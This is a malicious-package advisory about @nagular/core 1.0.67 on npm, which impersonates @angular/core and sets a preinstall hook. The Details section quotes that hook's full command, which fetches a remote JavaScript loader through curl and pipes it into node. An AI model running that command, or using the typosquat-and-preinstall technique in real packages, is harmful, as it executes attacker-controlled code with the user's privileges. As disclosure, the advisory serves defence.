Vulnerability MAL-2026-17499

Unknown
UNKNOWN RISK
Vulnerabilities without an assigned CVSS score. Severity is not determinable from available data.
2 days ago
October 03, 2026 at 06:47 AM UTC
Malicious code in @nagular/core (npm)
1.0.67
1.0.67

Summary

Malicious code in @nagular/core (npm)

Details

@nagular/[email protected] impersonates @angular/core (by name only; its code is an unrelated library described as "Core Libs") and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @nagular/core and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.

Impacted packages

Timeline

Published
2 days ago
October 03, 2026 at 06:47 AM UTC
Last Modified
1 hour ago
October 05, 2026 at 11:00 PM UTC